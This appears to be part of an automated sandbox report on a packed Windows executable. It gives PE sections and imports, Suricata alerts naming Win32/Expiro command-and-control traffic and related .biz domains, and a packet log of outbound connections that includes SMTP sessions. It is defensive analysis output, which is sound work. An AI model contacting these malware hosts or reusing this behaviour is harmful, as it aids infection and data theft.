IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x165d00	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x1659a0	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x11a000	0x6a0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6f188	0x6f200	16824105689e93571b28f6d652acf3f1	False	0.45466728768278963	data	6.6338226603175485	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.managed	0x71000	0x77a28	0x77c00	459fe8e4d0429964edfb07e39e66b232	False	0.46850331093423797	data	6.473781869755907	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
hydrated	0xe9000	0x30498	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x11a000	0x66c6a	0x66e00	9dd7b01a9b788316e3f5c4c725fc9985	False	0.48810800804981774	data	6.702711133976592	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x181000	0xd5a8	0x1800	9d5075bd44b367f703d8e922b003398a	False	0.2294921875	data	3.190641782829915	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x18f000	0xcdec	0xce00	638451eb673a6cdf25f666b19f1b8bb4	False	0.49419751213592233	data	6.064103613023274	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x19c000	0x1504dc	0x150600	90fa041622714596a2f765d7a7a1efc6	False	0.9996029879691565	data	7.999794460068793	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x2ed000	0x5b8	0x600	adcf9b9e4d3994d1018ad464f4f1db74	False	0.5826822916666666	data	5.215191968056739	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
BINARY	0x19c110	0x14fea4	data	1.0003108978271484
RT_VERSION	0x2ebfb4	0x33c	data	0.38164251207729466
RT_MANIFEST	0x2ec2f0	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
ADVAPI32.dll	RegOpenKeyExW, RegQueryValueExW, RegSetValueExW, RegCloseKey, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegEnumValueW
bcrypt.dll	BCryptCloseAlgorithmProvider, BCryptGenerateSymmetricKey, BCryptDestroyKey, BCryptOpenAlgorithmProvider, BCryptGenRandom
KERNEL32.dll	TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, EncodePointer, GetConsoleWindow, FreeConsole, AllocConsole, SetLastError, GetLastError, LocalFree, CloseHandle, ExitProcess, GetTickCount64, FormatMessageW, K32EnumProcessModulesEx, IsWow64Process, GetExitCodeProcess, OpenProcess, K32EnumProcesses, K32GetModuleInformation, K32GetModuleBaseNameW, K32GetModuleFileNameExW, GetProcessId, DuplicateHandle, GetCurrentProcess, CloseThreadpoolIo, GetCurrentProcessId, MultiByteToWideChar, GetStdHandle, RaiseFailFastException, GetCalendarInfoEx, CompareStringOrdinal, CompareStringEx, FindNLSStringEx, GetLocaleInfoEx, ResolveLocaleName, FindStringOrdinal, GetCurrentThread, Sleep, DeleteCriticalSection, EnterCriticalSection, SleepConditionVariableCS, LeaveCriticalSection, WakeConditionVariable, QueryPerformanceCounter, InitializeCriticalSection, InitializeConditionVariable, WaitForMultipleObjectsEx, QueryPerformanceFrequency, GetFullPathNameW, GetLongPathNameW, WideCharToMultiByte, LocalAlloc, GetConsoleOutputCP, GetProcAddress, LocaleNameToLCID, LCMapStringEx, EnumTimeFormatsEx, EnumCalendarInfoExEx, CreateFileW, CreateThreadpoolIo, StartThreadpoolIo, CancelThreadpoolIo, DeleteFileW, DeviceIoControl, ExpandEnvironmentStringsW, FindClose, FindFirstFileExW, FlushFileBuffers, FreeLibrary, GetFileAttributesExW, GetFileInformationByHandleEx, GetFileType, GetModuleFileNameW, GetOverlappedResult, LoadLibraryExW, ReadFile, SetFileInformationByHandle, SetThreadErrorMode, GetThreadPriority, SetThreadPriority, WriteFile, GetCurrentProcessorNumberEx, SetEvent, CreateEventExW, GetEnvironmentVariableW, FlushProcessWriteBuffers, WaitForSingleObjectEx, RtlVirtualUnwind, RtlCaptureContext, RtlRestoreContext, AddVectoredExceptionHandler, FlsAlloc, FlsGetValue, FlsSetValue, CreateEventW, TerminateProcess, SwitchToThread, CreateThread, GetCurrentThreadId, SuspendThread, ResumeThread, GetThreadContext, SetThreadContext, FlushInstructionCache, VirtualAlloc, VirtualProtect, VirtualFree, QueryInformationJobObject, GetModuleHandleW, GetModuleHandleExW, GetProcessAffinityMask, InitializeContext, GetEnabledXStateFeatures, SetXStateFeaturesMask, InitializeCriticalSectionEx, VirtualQuery, GetSystemTimeAsFileTime, ResetEvent, DebugBreak, WaitForSingleObject, SleepEx, GlobalMemoryStatusEx, GetSystemInfo, GetLogicalProcessorInformation, GetLogicalProcessorInformationEx, GetLargePageMinimum, VirtualUnlock, VirtualAllocExNuma, IsProcessInJob, GetNumaHighestNodeNumber, GetProcessGroupAffinity, K32GetProcessMemoryInfo, RaiseException, RtlPcToFileHeader, RtlUnwindEx, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, RtlLookupFunctionEntry, InitializeSListHead
ole32.dll	CoGetApartmentType, CoTaskMemAlloc, CoUninitialize, CoInitializeEx, CoTaskMemFree, CoWaitForMultipleHandles
api-ms-win-crt-heap-l1-1-0.dll	malloc, free, _callnewh, calloc, _set_new_mode
api-ms-win-crt-math-l1-1-0.dll	__setusermatherr
api-ms-win-crt-string-l1-1-0.dll	strcmp, _stricmp, strcpy_s, strncpy_s, wcsncmp
api-ms-win-crt-convert-l1-1-0.dll	strtoull
api-ms-win-crt-runtime-l1-1-0.dll	__p___wargv, _cexit, exit, terminate, _crt_atexit, _register_onexit_function, _initialize_onexit_table, __p___argc, _exit, abort, _initterm_e, _c_exit, _register_thread_local_exe_atexit_callback, _seh_filter_exe, _set_app_type, _initterm, _configure_wide_argv, _initialize_wide_environment, _get_initial_wide_environment
api-ms-win-crt-stdio-l1-1-0.dll	__stdio_common_vsprintf_s, __stdio_common_vfprintf, __p__commode, _set_fmode, __stdio_common_vsscanf, __acrt_iob_func
api-ms-win-crt-locale-l1-1-0.dll	_configthreadlocale

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-10T16:01:28.218699+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	54.244.188.177	80	192.168.2.4	49731	TCP
2025-01-10T16:01:28.218699+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	54.244.188.177	80	192.168.2.4	49731	TCP
2025-01-10T16:01:31.631469+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	18.141.10.107	80	192.168.2.4	49733	TCP
2025-01-10T16:01:31.631469+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	18.141.10.107	80	192.168.2.4	49733	TCP
2025-01-10T16:01:34.352890+0100	2051648	ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)	1	192.168.2.4	52171	1.1.1.1	53	UDP
2025-01-10T16:01:37.087261+0100	2051649	ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)	1	192.168.2.4	60692	1.1.1.1	53	UDP
2025-01-10T16:01:38.504955+0100	2850851	ETPRO MALWARE Win32/Expiro.NDO CnC Activity	1	192.168.2.4	49741	18.141.10.107	80	TCP
2025-01-10T16:01:52.647077+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	47.129.31.212	80	192.168.2.4	49752	TCP
2025-01-10T16:01:52.647077+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	47.129.31.212	80	192.168.2.4	49752	TCP
2025-01-10T16:01:54.336434+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	13.251.16.150	80	192.168.2.4	49753	TCP
2025-01-10T16:01:54.336434+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	13.251.16.150	80	192.168.2.4	49753	TCP
2025-01-10T16:01:55.670330+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	44.221.84.105	80	192.168.2.4	49755	TCP
2025-01-10T16:01:55.670330+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	44.221.84.105	80	192.168.2.4	49755	TCP
2025-01-10T16:02:00.971436+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	34.246.200.160	80	192.168.2.4	49760	TCP
2025-01-10T16:02:00.971436+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	34.246.200.160	80	192.168.2.4	49760	TCP
2025-01-10T16:02:01.909396+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	34.227.7.138	80	192.168.2.4	49761	TCP
2025-01-10T16:02:01.909396+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	34.227.7.138	80	192.168.2.4	49761	TCP
2025-01-10T16:02:07.204299+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	35.164.78.200	80	192.168.2.4	49785	TCP
2025-01-10T16:02:07.204299+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	35.164.78.200	80	192.168.2.4	49785	TCP
2025-01-10T16:02:07.937409+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	3.94.10.34	80	192.168.2.4	49793	TCP
2025-01-10T16:02:07.937409+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	3.94.10.34	80	192.168.2.4	49793	TCP
2025-01-10T16:02:12.545065+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	18.246.231.120	80	192.168.2.4	49820	TCP
2025-01-10T16:02:12.545065+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	18.246.231.120	80	192.168.2.4	49820	TCP
2025-01-10T16:02:32.985038+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	3.254.94.185	80	192.168.2.4	49963	TCP
2025-01-10T16:02:32.985038+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	3.254.94.185	80	192.168.2.4	49963	TCP
2025-01-10T16:02:39.131094+0100	2850851	ETPRO MALWARE Win32/Expiro.NDO CnC Activity	1	192.168.2.4	50007	34.227.7.138	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 16:01:27.248723030 CET	49730	443	192.168.2.4	104.26.13.205
Jan 10, 2025 16:01:27.248768091 CET	443	49730	104.26.13.205	192.168.2.4
Jan 10, 2025 16:01:27.248850107 CET	49730	443	192.168.2.4	104.26.13.205
Jan 10, 2025 16:01:27.253776073 CET	49731	80	192.168.2.4	54.244.188.177
Jan 10, 2025 16:01:27.258601904 CET	80	49731	54.244.188.177	192.168.2.4
Jan 10, 2025 16:01:27.258723021 CET	49731	80	192.168.2.4	54.244.188.177
Jan 10, 2025 16:01:27.261519909 CET	49731	80	192.168.2.4	54.244.188.177
Jan 10, 2025 16:01:27.261543036 CET	49731	80	192.168.2.4	54.244.188.177
Jan 10, 2025 16:01:27.266387939 CET	80	49731	54.244.188.177	192.168.2.4
Jan 10, 2025 16:01:27.266408920 CET	80	49731	54.244.188.177	192.168.2.4
Jan 10, 2025 16:01:27.267249107 CET	49730	443	192.168.2.4	104.26.13.205
Jan 10, 2025 16:01:27.267270088 CET	443	49730	104.26.13.205	192.168.2.4
Jan 10, 2025 16:01:27.752718925 CET	443	49730	104.26.13.205	192.168.2.4
Jan 10, 2025 16:01:27.752923965 CET	49730	443	192.168.2.4	104.26.13.205
Jan 10, 2025 16:01:27.760675907 CET	49730	443	192.168.2.4	104.26.13.205
Jan 10, 2025 16:01:27.760696888 CET	443	49730	104.26.13.205	192.168.2.4
Jan 10, 2025 16:01:27.760993004 CET	443	49730	104.26.13.205	192.168.2.4
Jan 10, 2025 16:01:27.802414894 CET	49730	443	192.168.2.4	104.26.13.205
Jan 10, 2025 16:01:27.920574903 CET	49730	443	192.168.2.4	104.26.13.205
Jan 10, 2025 16:01:27.967325926 CET	443	49730	104.26.13.205	192.168.2.4
Jan 10, 2025 16:01:27.968076944 CET	80	49731	54.244.188.177	192.168.2.4
Jan 10, 2025 16:01:27.968482971 CET	80	49731	54.244.188.177	192.168.2.4
Jan 10, 2025 16:01:27.968657970 CET	49731	80	192.168.2.4	54.244.188.177
Jan 10, 2025 16:01:28.029053926 CET	443	49730	104.26.13.205	192.168.2.4
Jan 10, 2025 16:01:28.029124975 CET	443	49730	104.26.13.205	192.168.2.4
Jan 10, 2025 16:01:28.029198885 CET	49730	443	192.168.2.4	104.26.13.205
Jan 10, 2025 16:01:28.069734097 CET	49730	443	192.168.2.4	104.26.13.205
Jan 10, 2025 16:01:28.213730097 CET	49731	80	192.168.2.4	54.244.188.177
Jan 10, 2025 16:01:28.218698978 CET	80	49731	54.244.188.177	192.168.2.4
Jan 10, 2025 16:01:29.871710062 CET	49732	2049	192.168.2.4	212.162.149.53
Jan 10, 2025 16:01:29.876708984 CET	2049	49732	212.162.149.53	192.168.2.4
Jan 10, 2025 16:01:29.876794100 CET	49732	2049	192.168.2.4	212.162.149.53
Jan 10, 2025 16:01:29.897280931 CET	49732	2049	192.168.2.4	212.162.149.53
Jan 10, 2025 16:01:29.902165890 CET	2049	49732	212.162.149.53	192.168.2.4
Jan 10, 2025 16:01:30.115653038 CET	49733	80	192.168.2.4	18.141.10.107
Jan 10, 2025 16:01:30.120616913 CET	80	49733	18.141.10.107	192.168.2.4
Jan 10, 2025 16:01:30.120711088 CET	49733	80	192.168.2.4	18.141.10.107
Jan 10, 2025 16:01:30.124608994 CET	49733	80	192.168.2.4	18.141.10.107
Jan 10, 2025 16:01:30.124631882 CET	49733	80	192.168.2.4	18.141.10.107
Jan 10, 2025 16:01:30.129508018 CET	80	49733	18.141.10.107	192.168.2.4
Jan 10, 2025 16:01:30.129543066 CET	80	49733	18.141.10.107	192.168.2.4
Jan 10, 2025 16:01:30.138624907 CET	49734	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:01:30.143598080 CET	587	49734	51.195.88.199	192.168.2.4
Jan 10, 2025 16:01:30.143665075 CET	49734	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:01:30.898437023 CET	587	49734	51.195.88.199	192.168.2.4
Jan 10, 2025 16:01:30.905879974 CET	49734	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:01:30.910738945 CET	587	49734	51.195.88.199	192.168.2.4
Jan 10, 2025 16:01:31.083967924 CET	587	49734	51.195.88.199	192.168.2.4
Jan 10, 2025 16:01:31.096324921 CET	49734	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:01:31.101205111 CET	587	49734	51.195.88.199	192.168.2.4
Jan 10, 2025 16:01:31.274692059 CET	587	49734	51.195.88.199	192.168.2.4
Jan 10, 2025 16:01:31.283385992 CET	49734	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:01:31.288228989 CET	587	49734	51.195.88.199	192.168.2.4
Jan 10, 2025 16:01:31.483999014 CET	587	49734	51.195.88.199	192.168.2.4
Jan 10, 2025 16:01:31.484014988 CET	587	49734	51.195.88.199	192.168.2.4
Jan 10, 2025 16:01:31.484028101 CET	587	49734	51.195.88.199	192.168.2.4
Jan 10, 2025 16:01:31.484090090 CET	49734	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:01:31.488666058 CET	587	49734	51.195.88.199	192.168.2.4
Jan 10, 2025 16:01:31.488761902 CET	49734	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:01:31.502162933 CET	80	49733	18.141.10.107	192.168.2.4
Jan 10, 2025 16:01:31.502312899 CET	80	49733	18.141.10.107	192.168.2.4
Jan 10, 2025 16:01:31.502398968 CET	49733	80	192.168.2.4	18.141.10.107
Jan 10, 2025 16:01:31.626260996 CET	49733	80	192.168.2.4	18.141.10.107
Jan 10, 2025 16:01:31.631469011 CET	80	49733	18.141.10.107	192.168.2.4
Jan 10, 2025 16:01:31.733833075 CET	49734	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:01:31.738766909 CET	587	49734	51.195.88.199	192.168.2.4
Jan 10, 2025 16:01:31.928756952 CET	587	49734	51.195.88.199	192.168.2.4
Jan 10, 2025 16:01:31.951577902 CET	49734	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:01:31.956461906 CET	587	49734	51.195.88.199	192.168.2.4
Jan 10, 2025 16:01:32.139555931 CET	587	49734	51.195.88.199	192.168.2.4
Jan 10, 2025 16:01:32.141160011 CET	49734	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:01:32.146967888 CET	587	49734	51.195.88.199	192.168.2.4
Jan 10, 2025 16:01:32.319458008 CET	587	49734	51.195.88.199	192.168.2.4
Jan 10, 2025 16:01:32.389667034 CET	49734	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:01:32.394669056 CET	587	49734	51.195.88.199	192.168.2.4
Jan 10, 2025 16:01:32.838973045 CET	49735	80	192.168.2.4	54.244.188.177
Jan 10, 2025 16:01:32.843930960 CET	80	49735	54.244.188.177	192.168.2.4
Jan 10, 2025 16:01:32.844010115 CET	49735	80	192.168.2.4	54.244.188.177
Jan 10, 2025 16:01:32.844253063 CET	49735	80	192.168.2.4	54.244.188.177
Jan 10, 2025 16:01:32.844276905 CET	49735	80	192.168.2.4	54.244.188.177
Jan 10, 2025 16:01:32.849158049 CET	80	49735	54.244.188.177	192.168.2.4
Jan 10, 2025 16:01:32.849174976 CET	80	49735	54.244.188.177	192.168.2.4
Jan 10, 2025 16:01:33.558762074 CET	80	49735	54.244.188.177	192.168.2.4
Jan 10, 2025 16:01:33.558789015 CET	80	49735	54.244.188.177	192.168.2.4
Jan 10, 2025 16:01:33.558840990 CET	49735	80	192.168.2.4	54.244.188.177
Jan 10, 2025 16:01:33.562947989 CET	49735	80	192.168.2.4	54.244.188.177
Jan 10, 2025 16:01:33.567835093 CET	80	49735	54.244.188.177	192.168.2.4
Jan 10, 2025 16:01:33.829463959 CET	49736	80	192.168.2.4	44.221.84.105
Jan 10, 2025 16:01:33.834497929 CET	80	49736	44.221.84.105	192.168.2.4
Jan 10, 2025 16:01:33.834661961 CET	49736	80	192.168.2.4	44.221.84.105
Jan 10, 2025 16:01:33.834790945 CET	49736	80	192.168.2.4	44.221.84.105
Jan 10, 2025 16:01:33.834803104 CET	49736	80	192.168.2.4	44.221.84.105
Jan 10, 2025 16:01:33.839595079 CET	80	49736	44.221.84.105	192.168.2.4
Jan 10, 2025 16:01:33.839615107 CET	80	49736	44.221.84.105	192.168.2.4
Jan 10, 2025 16:01:34.291531086 CET	587	49734	51.195.88.199	192.168.2.4
Jan 10, 2025 16:01:34.291816950 CET	49734	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:01:34.296638966 CET	587	49734	51.195.88.199	192.168.2.4
Jan 10, 2025 16:01:34.299659014 CET	80	49736	44.221.84.105	192.168.2.4
Jan 10, 2025 16:01:34.299781084 CET	80	49736	44.221.84.105	192.168.2.4
Jan 10, 2025 16:01:34.299817085 CET	49736	80	192.168.2.4	44.221.84.105
Jan 10, 2025 16:01:34.299853086 CET	49736	80	192.168.2.4	44.221.84.105
Jan 10, 2025 16:01:34.304661989 CET	80	49736	44.221.84.105	192.168.2.4
Jan 10, 2025 16:01:34.400687933 CET	49737	80	192.168.2.4	72.52.178.23
Jan 10, 2025 16:01:34.405544043 CET	80	49737	72.52.178.23	192.168.2.4
Jan 10, 2025 16:01:34.405656099 CET	49737	80	192.168.2.4	72.52.178.23
Jan 10, 2025 16:01:34.405782938 CET	49737	80	192.168.2.4	72.52.178.23
Jan 10, 2025 16:01:34.405782938 CET	49737	80	192.168.2.4	72.52.178.23
Jan 10, 2025 16:01:34.410569906 CET	80	49737	72.52.178.23	192.168.2.4
Jan 10, 2025 16:01:34.410587072 CET	80	49737	72.52.178.23	192.168.2.4
Jan 10, 2025 16:01:34.469867945 CET	587	49734	51.195.88.199	192.168.2.4
Jan 10, 2025 16:01:34.520242929 CET	49734	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:01:34.525336981 CET	587	49734	51.195.88.199	192.168.2.4
Jan 10, 2025 16:01:34.525480032 CET	49734	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:01:34.766871929 CET	49738	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:01:34.771915913 CET	587	49738	51.195.88.199	192.168.2.4
Jan 10, 2025 16:01:34.772105932 CET	49738	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:01:34.945739031 CET	80	49737	72.52.178.23	192.168.2.4
Jan 10, 2025 16:01:35.084413052 CET	49737	80	192.168.2.4	72.52.178.23
Jan 10, 2025 16:01:35.410550117 CET	49739	80	192.168.2.4	76.223.26.96
Jan 10, 2025 16:01:35.415514946 CET	80	49739	76.223.26.96	192.168.2.4
Jan 10, 2025 16:01:35.415595055 CET	49739	80	192.168.2.4	76.223.26.96
Jan 10, 2025 16:01:35.415822983 CET	49739	80	192.168.2.4	76.223.26.96
Jan 10, 2025 16:01:35.420603991 CET	80	49739	76.223.26.96	192.168.2.4
Jan 10, 2025 16:01:35.650731087 CET	587	49738	51.195.88.199	192.168.2.4
Jan 10, 2025 16:01:35.650876045 CET	49738	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:01:35.655834913 CET	587	49738	51.195.88.199	192.168.2.4
Jan 10, 2025 16:01:35.886878967 CET	587	49738	51.195.88.199	192.168.2.4
Jan 10, 2025 16:01:35.887095928 CET	49738	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:01:35.892023087 CET	587	49738	51.195.88.199	192.168.2.4
Jan 10, 2025 16:01:36.073718071 CET	587	49738	51.195.88.199	192.168.2.4
Jan 10, 2025 16:01:36.074057102 CET	49738	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:01:36.078986883 CET	587	49738	51.195.88.199	192.168.2.4
Jan 10, 2025 16:01:36.164372921 CET	80	49739	76.223.26.96	192.168.2.4
Jan 10, 2025 16:01:36.164448023 CET	80	49739	76.223.26.96	192.168.2.4
Jan 10, 2025 16:01:36.164479971 CET	80	49739	76.223.26.96	192.168.2.4
Jan 10, 2025 16:01:36.164503098 CET	49739	80	192.168.2.4	76.223.26.96
Jan 10, 2025 16:01:36.164516926 CET	80	49739	76.223.26.96	192.168.2.4
Jan 10, 2025 16:01:36.164554119 CET	80	49739	76.223.26.96	192.168.2.4
Jan 10, 2025 16:01:36.164561033 CET	49739	80	192.168.2.4	76.223.26.96
Jan 10, 2025 16:01:36.164583921 CET	80	49739	76.223.26.96	192.168.2.4
Jan 10, 2025 16:01:36.164623976 CET	49739	80	192.168.2.4	76.223.26.96
Jan 10, 2025 16:01:36.164634943 CET	80	49739	76.223.26.96	192.168.2.4
Jan 10, 2025 16:01:36.164690018 CET	80	49739	76.223.26.96	192.168.2.4
Jan 10, 2025 16:01:36.164724112 CET	80	49739	76.223.26.96	192.168.2.4
Jan 10, 2025 16:01:36.164731026 CET	49739	80	192.168.2.4	76.223.26.96
Jan 10, 2025 16:01:36.164778948 CET	80	49739	76.223.26.96	192.168.2.4
Jan 10, 2025 16:01:36.164829969 CET	49739	80	192.168.2.4	76.223.26.96
Jan 10, 2025 16:01:36.169940948 CET	80	49739	76.223.26.96	192.168.2.4
Jan 10, 2025 16:01:36.169976950 CET	80	49739	76.223.26.96	192.168.2.4
Jan 10, 2025 16:01:36.170012951 CET	80	49739	76.223.26.96	192.168.2.4
Jan 10, 2025 16:01:36.170032978 CET	49739	80	192.168.2.4	76.223.26.96
Jan 10, 2025 16:01:36.170047998 CET	80	49739	76.223.26.96	192.168.2.4
Jan 10, 2025 16:01:36.170090914 CET	49739	80	192.168.2.4	76.223.26.96
Jan 10, 2025 16:01:36.170234919 CET	80	49739	76.223.26.96	192.168.2.4
Jan 10, 2025 16:01:36.254909992 CET	80	49739	76.223.26.96	192.168.2.4
Jan 10, 2025 16:01:36.254951000 CET	80	49739	76.223.26.96	192.168.2.4
Jan 10, 2025 16:01:36.254982948 CET	49739	80	192.168.2.4	76.223.26.96
Jan 10, 2025 16:01:36.265795946 CET	587	49738	51.195.88.199	192.168.2.4
Jan 10, 2025 16:01:36.265830994 CET	587	49738	51.195.88.199	192.168.2.4
Jan 10, 2025 16:01:36.265883923 CET	587	49738	51.195.88.199	192.168.2.4
Jan 10, 2025 16:01:36.265887976 CET	49738	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:01:36.267509937 CET	49738	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:01:36.272372007 CET	587	49738	51.195.88.199	192.168.2.4
Jan 10, 2025 16:01:36.340089083 CET	49737	80	192.168.2.4	72.52.178.23
Jan 10, 2025 16:01:36.340143919 CET	49737	80	192.168.2.4	72.52.178.23
Jan 10, 2025 16:01:36.344953060 CET	80	49737	72.52.178.23	192.168.2.4
Jan 10, 2025 16:01:36.344975948 CET	80	49737	72.52.178.23	192.168.2.4
Jan 10, 2025 16:01:36.396233082 CET	49739	80	192.168.2.4	76.223.26.96
Jan 10, 2025 16:01:36.456429958 CET	587	49738	51.195.88.199	192.168.2.4
Jan 10, 2025 16:01:36.457401991 CET	49738	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:01:36.462297916 CET	587	49738	51.195.88.199	192.168.2.4
Jan 10, 2025 16:01:36.484292030 CET	80	49737	72.52.178.23	192.168.2.4
Jan 10, 2025 16:01:36.510018110 CET	49740	80	192.168.2.4	199.59.243.228
Jan 10, 2025 16:01:36.514946938 CET	80	49740	199.59.243.228	192.168.2.4
Jan 10, 2025 16:01:36.515059948 CET	49740	80	192.168.2.4	199.59.243.228
Jan 10, 2025 16:01:36.515223980 CET	49740	80	192.168.2.4	199.59.243.228
Jan 10, 2025 16:01:36.520026922 CET	80	49740	199.59.243.228	192.168.2.4
Jan 10, 2025 16:01:36.584041119 CET	49737	80	192.168.2.4	72.52.178.23
Jan 10, 2025 16:01:36.644040108 CET	587	49738	51.195.88.199	192.168.2.4
Jan 10, 2025 16:01:36.645078897 CET	49738	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:01:36.650125027 CET	587	49738	51.195.88.199	192.168.2.4
Jan 10, 2025 16:01:36.995902061 CET	80	49740	199.59.243.228	192.168.2.4
Jan 10, 2025 16:01:36.995929003 CET	80	49740	199.59.243.228	192.168.2.4
Jan 10, 2025 16:01:36.996000051 CET	49740	80	192.168.2.4	199.59.243.228
Jan 10, 2025 16:01:37.125834942 CET	49741	80	192.168.2.4	18.141.10.107
Jan 10, 2025 16:01:37.130847931 CET	80	49741	18.141.10.107	192.168.2.4
Jan 10, 2025 16:01:37.130933046 CET	49741	80	192.168.2.4	18.141.10.107
Jan 10, 2025 16:01:37.134337902 CET	49741	80	192.168.2.4	18.141.10.107
Jan 10, 2025 16:01:37.134367943 CET	49741	80	192.168.2.4	18.141.10.107
Jan 10, 2025 16:01:37.139239073 CET	80	49741	18.141.10.107	192.168.2.4
Jan 10, 2025 16:01:37.139272928 CET	80	49741	18.141.10.107	192.168.2.4
Jan 10, 2025 16:01:38.504878044 CET	80	49741	18.141.10.107	192.168.2.4
Jan 10, 2025 16:01:38.504901886 CET	80	49741	18.141.10.107	192.168.2.4
Jan 10, 2025 16:01:38.504955053 CET	49741	80	192.168.2.4	18.141.10.107
Jan 10, 2025 16:01:38.536986113 CET	49741	80	192.168.2.4	18.141.10.107
Jan 10, 2025 16:01:38.542104006 CET	80	49741	18.141.10.107	192.168.2.4
Jan 10, 2025 16:01:38.777079105 CET	49742	80	192.168.2.4	82.112.184.197
Jan 10, 2025 16:01:38.781965017 CET	80	49742	82.112.184.197	192.168.2.4
Jan 10, 2025 16:01:38.782092094 CET	49742	80	192.168.2.4	82.112.184.197
Jan 10, 2025 16:01:38.782407999 CET	49742	80	192.168.2.4	82.112.184.197
Jan 10, 2025 16:01:38.782407999 CET	49742	80	192.168.2.4	82.112.184.197
Jan 10, 2025 16:01:38.787275076 CET	80	49742	82.112.184.197	192.168.2.4
